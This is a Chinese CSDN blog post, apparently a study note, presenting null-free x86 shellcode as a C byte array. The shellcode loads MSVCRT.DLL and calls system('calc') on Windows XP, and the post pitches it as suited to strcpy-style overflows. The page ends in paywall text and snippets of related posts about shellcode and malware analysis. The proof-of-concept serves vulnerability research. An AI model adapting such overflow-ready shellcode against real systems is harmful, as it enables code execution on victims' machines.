shellcode样本—弹出计算器

最新推荐文章于 2024-09-19 22:33:02 发布
最新推荐文章于 2024-09-19 22:33:02 发布
阅读量1.8k 收藏 1
点赞数
分类专栏: 漏洞原理笔记 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/musilintan/article/details/116243553
版权

该样本弹出计算器的原理为:
1)先加载MSVCRT.DLL。
2)再使用system()函数调用calc命令。

该shellcode脚本只在xp下通过实验,仅适合用来研究和验证漏洞。其中的函数地址采用的都是固定地址。win7以上不适用。

该样本特点:没有任何0x00,可以参与字符串类溢出。比如strcpy等。

unsigned char shellcode2[] =
		"\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"
		"\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6"
		"\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA"
		"\x7b\x1d\x80\x7c"
		"\x52\x8D\x45\xF4\x50"
		"\xFF\x55\xF0"
		"\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x61\x6C\x63\x89\x45\xF4\x33\xC0\x89\x45\xF8"
		"\x8D\x45\xF4"
		"\x50\xB8"
		"\xc7\x93\xbf\x77"
		"\xFF\xD0"
最低0.47元/天 解锁文章
孤月丶星辰
关注
专栏目录
[系统安全] 二十七.WannaCry勒索病毒分析 (3)蠕虫传播机制解析及IDA和OD逆向
杨秀璋的专栏
03-06 6481
前文分享了MSF利用MS17-010漏洞进行反Shell,再上传勒索病毒,复现了WannaCry勒索病毒。这篇文章作者将继续分析WannaCry勒索病毒,主要通过IDA和OD逆向分析蠕虫传播部分,详细讲解蠕虫是如何感染传播的。同时,由于作者技术真的菜,只能叙述自己摸索的过程,如果存在错误或不足之处,还望告知。希望这篇基础性文章对您有所帮助~
[系统安全] 十七.Windows PE病毒概念、分类及感染方式详解
杨秀璋的专栏
02-01 1万+
作者前文介绍了PE文件格式,熟悉各种PE编辑查看工具,针对目标EXE程序新增对话框等;这篇文章将介绍Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。这些基础性知识不仅和系统安全相关,同样与我们身边的APP、常用软件及操作系统紧密联系,希望这些知识对您有所帮助,更希望大家提高安全意识,安全保障任重道远。本文参考了《软件安全》视频、安全网站和参考文献中的文章,并结合自己的经验和实践进行撰写,也推荐大家阅读参考文献。
汇编语言编写shellcode实现计算器
yeanhoo的博客
04-04 1974
使用汇编语言编写shellcode,调用WinExec实现弹出计算器,汇编代码如下: .386 .model flat,stdcall ; 代码区域 .code main: push ebp mov ebp,esp sub esp,20h; 开辟栈空间 ; 获取Kernel32基址 assume fs:nothing mov eax,[fs:30h]; peb结构所在地址 mov ...
shellcode2--弹出计算器
gclome的博客
02-18 2317
// 345.cpp : Defines the entry point for the console application. // #include "stdafx.h" #include "stdio.h" #include "windows.h" char shellcode[]="\x66\x81\xEC\x54\x04\x33\xDB\x53\x68\x2E\x65\x78\x65\...
Windows X64 计算器shellcode
最新发布
weixin_54005873的博客
09-19 448
[72, 129, 236, 0, 1, 0, 0, 101, 72, 139, 4, 37, 96, 0, 0, 0, 72, 139, 64, 24, 72, 139, 64, 48, 72, 139, 112, 16, 72, 139, 88, 64, 72, 139, 0, 129, 123, 12, 51, 0, 50, 0, 117, 236, 72, 139, 206, 72, 199, 194, 50, 116, 145, 12, 232, 192, 0, 0, 0, 76, 139, 2
shellcode
m0_62207482的博客
02-09 602
在漏洞利用中,shellcode是不可或缺的部分,所以在网上有许多公开分享的 shellcode ,在不同平台上并不通用,需要选择适合的shellcode。这里推荐两个常 见公开的安全平台:一个为公开的漏洞库exploit-db(见公众号链接10-1),一个 为公开的Shell-strom库(见公众号链接10-2),如图10-1和图10-2所示。6)成功弹出计算器程序。5)运行后可以成功弹出计算器,如图10-3所示,但这还没有结束,如果目标 机器中没有Python环境,shellcode便无法执行。
shellcode——1、采用硬编码弹出计算器
alwin_cx的博客
05-19 6569
一、shellcode介绍    用一句话给shellcode下个定义,那就是“一段可以执行特定功能的机器码”。二、实验环境及工具介绍实验环境:Windows XP SP3实验工具:OllyDbg、WinHex、LordPE三、编程思路     用C语言来描述其实就是两句:WinExec("calc.exe", 5); ExitProcess(0);     看到有些文章会在开头还加一句:Load...
win7下模拟溢出漏洞利用shellcode弹出计算器
天空下得大海
10-07 3372
win7 溢出漏洞 shellcode 弹出计算器
msf生成的shellcode分析--走,组团分析shellcode
m0_64973256的博客
05-11 1009
作者丨selph 分析MSF Windows/exec Shellcode 最近分析漏洞用到msf生成的样本进行测试,其中用到payload选项为Windows/exec cmd="calc.exe"的这个payload,本着一定要知道利用代码是怎么运行的想法,开始对该shellcode的详细分析。 实验环境 •虚拟机:Kali Linux 2022.1 x64 •物理机:Windows 10 21H2 家庭版 •软件:x86...
[网络安全自学篇] 七十九.Windows PE病毒原理、分类及感染方式详解
热门推荐
杨秀璋的专栏
05-20 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了XSS跨站脚本攻击案例,主要内容包括XSS原理、不同类型的XSS、XSS靶场9道题目、如何防御XSS。这篇文章将介绍Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。基础性文章,希望对您有所帮助~
c和汇编混合编程----shellcode----弹出计算器
qq_41683305的博客
02-09 1081
先用c和汇编混合编程成功弹出计算器(在VC++里运行) #include "stdio.h" #include "windows.h" int main(int argc, char* argv[]) { printf("begin\n"); HINSTANCE libHandle; char *dll="kernel32.dll"; libHandle=LoadLibrar...
dll劫持payload.dll弹出计算器
03-18
dll劫持payload.dll弹出计算器
shellcode转换工具
07-26
shellcode转换工具
shellcode帮助工具,直接把exe转shellcode
12-29
Shellcode Helper v1.62 Coded by TeLeMan (c) 2008-2013 Usage: schelper.exe [options] Options: -i [input file] input file (Default: stdin) -o [output file] output file (Default: stdout) -s input file format (Default: Auto-Detection) -sb input file format is Binary -sp the input file format's parameters -d output file format (Default: C format) -db output file format is Binary -dp the output file format's parameters -search get the start offset by the pattern: e.g. PK\x03\x04 -soff fix the match offset after searching (Default: 0) -off convert the input file from the offset (Default: 0) -len convert the input file with the length (Default: 0 - MAX) -en [encoder] encode shellcode (Default: XorDword) -de [encoder] decode shellcode (Default: Auto-Detection) -ex exclude characters: e.g. 0x00,0x01-0x1F,0xFF (Default: 0x00) -in incude characters only -ep the encoder's parameters -t [pid] execute or inject shellcode into process for testing -td [pid] execute or inject shellcode into process for debugging -stack put shellcode into stack and execute it (ESP is the shellcode start) -noinfo display no normal messages except error messages Available formats: 0 - C 1 - C(HexArray) 2 - Perl 3 - Python 4 - Ruby 5 - JavaScript(Escape) 6 - VBScript(Escape) 7 - Pascal 8 - MASM(Data) 9 - HexDump 10 - BitString 11 - HexString 12 - HexArray(C like) 13 - Base64 14 - Binary 15 - HexString(C like) 16 - HexString(Escape) 17 - HexString(JavaScript,UNICODE) 18 - URI(ISO-8859-1) 19 - XML(PCDATA) 20 - BigNumber 21 - BigNumber(Hex) 22 - BigNumber(BaseX) 23 - FloatPoint 24 - UnixTimestamp 25 - GUID 26 - MASM(ASM) 27 - NASM 28 - YASM(ASM) 29 - FASM(ASM) 30 - JWASM(ASM) 31 - POASM(ASM) 32 - GOASM(ASM) 33 - GNU ASM Available encoders:
DLL版计算器 编程练习必备
04-10
DLL版计算器 附源码VC 6.0++工程文件
shellcode模板
r250414958的博客
02-12 487
shellcode一直都是漏洞利用关键的一环,关于shellcode怎么编写网上已经有很多优秀的文章,对于利用空间有限的漏洞,往往需要自己精心设计shellcode利用每一个字节的空间,而当漏洞有足够空间让我们发挥的时候再去一条条用汇编设计显然有点效率不足了(dalao除外),这就诞生了后面的shellcode模板 目前我发现好用公开的模板有 TK教主的shellcode模板 https://gi...
ShellCode01: 弹出计算器
weixin_30399797的博客
04-15 924
简单地讲,ShellCode就是一段01二进制的机器码,试图利用软件中的漏洞完成自己想做的事情。ShellCode的编写需要考虑和顾及的东西很多,这里先写一个适合新手的范例。 *需要的预备知识: 1.汇编语言(尤其要清楚了解函数是如何调用的) 2.PE文件格式(可参考《Windows PE 权威指南》一书) 3.一点点WinAPI函数 *使用的工具软件: 1.MASM32 2....
shellcode样本弹出MessageBox
谈成(C/C++)
04-26 961
shellcode是一段可独立运行的汇编代码,常出现在漏洞利用中。当我们利用漏洞控制了eip后,就需要shellcode来执行我们想要做的任何事。 shellcode用到的api都是通过动态加载而来的,可以通过fs:[30h]找到PEB中的Ldr结构。在Ldr中记录有dll加载链,从而找到Kernel32。然后通过LoadLibraryA加载任何你想要加载的dll模块。 所有API均通过dll中的EAT导出表查询获得。以下面就是一个用来生成弹出MessageBox的shellcode样本,可以用来测试漏洞利
shell语言编写计算器源代码,详细注释
qq_29531077的博客
04-22 341
【代码】用shell语言编写计算器源代码,详细注释。
shellcode计算器
09-08
shellcode计算器是一种恶意代码,用于利用计算机系统中的漏洞,并在系统中执行特定的操作。引用中提到的样本是一种shellcode,它的原理是通过加载MSVCRT.DLL库,然后使用system()函数调用calc命令,从而打开计算器应用程序。然而,引用中指出,该shellcode脚本只在Windows XP系统下适用,且其中的函数地址采用的是固定地址,不适用于Windows 7及以上版本的系统。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

孤月丶星辰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值